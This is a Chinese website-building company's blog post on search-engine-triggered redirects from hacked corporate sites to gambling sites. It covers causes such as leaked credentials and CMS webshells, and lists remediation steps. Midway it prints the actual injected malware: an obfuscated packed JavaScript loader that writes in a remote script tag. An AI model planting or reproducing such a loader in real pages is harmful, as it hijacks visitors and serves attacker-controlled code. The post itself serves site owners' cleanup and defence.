400-048-0001
网站建设资讯详细

企业网站恶意跳转赌博网站如何处理

发表日期:2018-08-07   作者来源:大连网龙   浏览:194

  最近公司内部跟单同事表示,大批网站建设公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的,这样一来用户流失造成访问量急剧下滑、网站服务器资源浪费、推广费用浪费等,甚至可以说做了百度推广、搜狗推广的都在给彩票公司做广告了,在网站建设行业内引起轩然大波。

  有不少客户在反应这个问题时候,找到广告商赔偿甚至追究责任,所以在网站恶意跳转的问题上我们运营人员需要重视并且知晓如何快速解决,网站建设公司骏域网络从网络上查阅并且测试后总结为以下经验:

  一、分析网站被黑跳转博彩网站原因

  一般情况下网站被黑时候后都是因为服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码)和网站信息包括FTP账号密码的对接被黑客知晓,进而造成黑客植入木马或者后门。

  整体的安全监测中,asp网站和php网站都存在着木马,这也就意味着木马能够以php脚本木马、asp脚本木马、jsp脚本木马而存在,这些木马后门可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

  当我们懂得一些代码的时候,必然会看到网站首页中会有一些恶意篡改代码,通过删除恶意代码后可能会在几天内完全的停止跳转的,但是在一段时间后却又会被跳转,这个是很令人懊恼的治标不治本措施。过了不久后网站又会出现跳转,那么针对于网站漏洞问题是很难甚至是不能够完全清除的。

  通过观察部分客户网站首页,其首页代码中都会有一段加密代码,这段代码是根据搜索引擎的特征来跳转,比如通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:

  type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

  一旦被攻击之后,百度搜索引擎就会判断出网站是否被攻击,从而在百度风险评估中心就会对网站进行记录以及标识,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截。

  针对于以上跳转攻击的特征,我们广州网站建设公司一致认为应该从人工代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞等。

  二、修复以及防止网站被恶意跳转的办法

  1、对服务器目录进行安全部署、对管理员帐号密码加密、对所有密码进行数字+大小写字母+特殊符号要求、对网站数据库进行分配普通权限账号。

  2、mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

  3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

  4、对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

  网站建设公司处理网站跳转问题有很多方法,以上内容只是解决问题的方法之一,那么作为一个网站建设公司应该对源码进行优化和调整,这样才能确保后期的网站不会受到影响,这就涉及到网站源码升级以及版本升级问题。